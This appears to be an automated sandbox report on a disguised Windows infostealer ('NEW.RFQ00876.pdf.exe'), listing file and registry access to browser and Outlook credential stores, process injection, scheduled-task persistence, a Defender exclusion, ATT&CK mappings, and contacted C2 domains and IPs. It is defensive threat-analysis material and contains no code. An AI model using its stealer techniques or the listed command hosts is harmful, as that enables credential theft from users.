                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Queries volume information: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                MITRE ATT&CK Matrix
                Matched techniques by tactic; the number in parentheses is the count the matrix shows next to that technique. Matrix cells for Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration and Impact carried no match.

                Execution: Scheduled Task/Job (1)
                Persistence: Scheduled Task/Job (1); DLL Side-Loading (1)
                Privilege Escalation: Process Injection (412); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
                Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (1); Input Capture (1)
                Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (113)
                Collection: Email Collection (1); Input Capture (1); Archive Collected Data (1); Data from Local System (1)
                Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4)
                Behavior Graph
                Behavior Graph ID: 1571204 | Sample: NEW.RFQ00876.pdf.exe | Startdate: 09/12/2024 | Architecture: WINDOWS | Score: 100

                DNS/IP at start: www.zoiheat.xyz; www.learniit.info; 18 other IPs or domains
                Signatures at start: Suricata IDS alerts for network traffic; Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 8 other signatures
                Signature on www.zoiheat.xyz: Performs DNS queries to domains with low reputation

                Process tree (indentation shows parent/child; "injected" marks a process the parent injected into rather than started):

                NEW.RFQ00876.pdf.exe (started)
                    dropped: C:\Users\user\AppData\...\RAangyFeHdZLco.exe (PE32); C:\...\RAangyFeHdZLco.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpEC94.tmp (XML); C:\Users\user\...\NEW.RFQ00876.pdf.exe.log (ASCII)
                    signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    NEW.RFQ00876.pdf.exe (started)
                        signatures: Maps a DLL or memory area into another process
                        aegBDZrMeWOlT.exe (injected)
                            signatures: Found direct / indirect Syscall (likely to bypass EDR)
                            msinfo32.exe (started)
                                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                aegBDZrMeWOlT.exe (injected)
                                    DNS/IP: www.learniit.info 203.161.42.73, ports 49962, 49968, 49974, VNPT-AS-VNVNPTCorpVN, Malaysia; smartcongress.net 146.88.233.115, ports 50002, 50003, 50004, PLANETHOSTER-8CA, France; 11 other IPs or domains
                                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                firefox.exe (started)
                    powershell.exe (started)
                        signatures: Loading BitLocker PowerShell Module
                        WmiPrvSE.exe (started)
                        conhost.exe (started)
                    powershell.exe (started)
                        conhost.exe (started)
                    schtasks.exe (started)
                        conhost.exe (started)
                RAangyFeHdZLco.exe (started)
                    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    schtasks.exe (started)
                        conhost.exe (started)
                    RAangyFeHdZLco.exe (started)



Source | Detection | Scanner | Label
NEW.RFQ00876.pdf.exe | 50% | ReversingLabs | ByteCode-MSIL.Infostealer.Pony
NEW.RFQ00876.pdf.exe | 49% | Virustotal |
NEW.RFQ00876.pdf.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | 50% | ReversingLabs | ByteCode-MSIL.Infostealer.Pony

No Antivirus matches

Source | Detection | Scanner | Label
www.bankseedz.info | 1% | Virustotal |
carsten.studio | 1% | Virustotal |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571204
Start date and time: 2024-12-09 06:55:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NEW.RFQ00876.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/16@18/13
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 137
• Number of non-executed functions: 294
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:56:20 | API Interceptor | 1x Sleep call for process: NEW.RFQ00876.pdf.exe modified
00:56:23 | API Interceptor | 54x Sleep call for process: powershell.exe modified
00:56:30 | API Interceptor | 1x Sleep call for process: RAangyFeHdZLco.exe modified
02:14:34 | API Interceptor | 11188602x Sleep call for process: msinfo32.exe modified
06:56:28 | Task Scheduler | Run new task: RAangyFeHdZLco path: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
146.88.233.115 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer
• www.smartcongress.net/qtfx/
146.88.233.115 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer
• www.smartcongress.net/11t3/
146.88.233.115 | Quotation sheet.exe | malicious | FormBook, PureLog Stealer
• www.smartcongress.net/11t3/
146.88.233.115 | Purchase Order PO.exe | malicious | FormBook
• www.smartcongress.net/qtfx/
146.88.233.115 | PO #2411071822.exe | malicious | FormBook
• www.smartcongress.net/11t3/
146.88.233.115 | Quotation.exe | malicious | FormBook
• www.smartcongress.net/11t3/
146.88.233.115 | payments.exe | malicious | FormBook
• www.smartcongress.net/11t3/
13.248.169.48 | DHL_734825510.exe | malicious | FormBook
• www.egyshare.xyz/440l/
13.248.169.48 | purchase order.exe | malicious | FormBook
• www.aktmarket.xyz/wb7v/
13.248.169.48 | SRT68.exe | malicious | FormBook
• www.avalanchefi.xyz/vxa5/
13.248.169.48 | ek8LkB2Cgo.exe | malicious | FormBook
• www.remedies.pro/4azw/
13.248.169.48 | Document_084462.scr.exe | malicious | FormBook, GuLoader
• www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
13.248.169.48 | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook
• www.smartgov.shop/1cwp/
13.248.169.48 | SW_5724.exe | malicious | FormBook
• www.egyshare.xyz/440l/
13.248.169.48 | attached invoice.exe | malicious | FormBook
• www.aktmarket.xyz/wb7v/
13.248.169.48 | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook
• www.tals.xyz/k1td/
13.248.169.48 | Proforma invoice - Arancia NZ.exe | malicious | FormBook
• www.optimismbank.xyz/98j3/
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
www.bankseedz.info | Document_084462.scr.exe | malicious | FormBook, GuLoader
• 46.30.211.38
www.bankseedz.info | Proforma invoice - Arancia NZ.exe | malicious | FormBook
• 46.30.211.38
www.bankseedz.info | PAYROLL LIST.exe | malicious | FormBook
• 46.30.211.38
natroredirect.natrocdn.com | DHL 40312052024.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | DHL 30312052024.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | rPaymentAdviceNote_pdf.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | lgkWBwqY15.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | SRT68.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | ek8LkB2Cgo.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | PO 4110007694.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | Latest advice payment.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | New Order.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | specification and drawing.exe | malicious | FormBook, PureLog Stealer
• 85.159.66.93
www.vayui.top | ek8LkB2Cgo.exe | malicious | FormBook
• 172.67.145.234
www.vayui.top | PO 4110007694.exe | malicious | FormBook
• 104.21.95.160
www.vayui.top | Latest advice payment.exe | malicious | FormBook
• 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader
• 172.67.145.234
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook
• 104.21.95.160
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook
• 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader
• 172.67.145.234
www.vayui.top | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader
• 104.21.95.160
www.vayui.top | purchase Order.exe | malicious | FormBook
• 172.67.145.234
www.vayui.top | RFQ 3100185 MAHAD.exe | malicious | FormBook
• 172.67.145.234
www.airrelax.shop | Order MEI PO IM202411484.exe | malicious | FormBook
• 172.67.215.235
www.airrelax.shop | IETC-24017.exe | malicious | FormBook, PureLog Stealer
• 104.21.16.206
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | SN500, SN150 Spec.exe | malicious | FormBook
• 172.67.177.137
CLOUDFLARENETUS | Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.67.152
CLOUDFLARENETUS | BUNKER INVOICE MV SUN OCEAN.pdf.vbs | malicious | GuLoader
• 104.21.65.104
CLOUDFLARENETUS | Bunker_STS_pdf.vbs | malicious | GuLoader
• 104.21.71.195
CLOUDFLARENETUS | Payment_Advice.vbs | malicious | GuLoader
• 172.67.148.42
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer
• 104.21.16.9
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc
• 104.21.35.43
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer
• 172.67.165.166
CLOUDFLARENETUS | jew.x86.elf | malicious | Unknown
• 104.30.121.99
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer
• 172.67.165.166
AMAZON-02US | jew.arm5.elf | malicious | Mirai
• 54.171.230.55
AMAZON-02US | jew.m68k.elf | malicious | Unknown
• 18.162.175.118
AMAZON-02US | jew.mips.elf | malicious | Unknown
• 18.241.248.28
AMAZON-02US | jew.ppc.elf | malicious | Unknown
• 13.122.1.68
AMAZON-02US | jew.mpsl.elf | malicious | Unknown
• 35.167.253.50
AMAZON-02US | jew.arm7.elf | malicious | Mirai
• 13.214.56.69
AMAZON-02US | jew.x86.elf | malicious | Unknown
• 54.97.170.50
AMAZON-02US | i.elf | malicious | Unknown
• 54.171.230.55
AMAZON-02US | Software_Tool.exe | malicious | Unknown
• 3.171.171.38
AMAZON-02US | mpsl.elf | malicious | Unknown
• 54.171.230.55
INTERNET-CZKtis238403KtisCZ | jmggnxeedy.elf | malicious | Unknown
• 81.2.245.22
INTERNET-CZKtis238403KtisCZ | lgkWBwqY15.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | New quotation request.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | 89778Cpy.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | SRT68.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | need quotations.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | UNGSno5k4G.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook
• 81.2.196.19
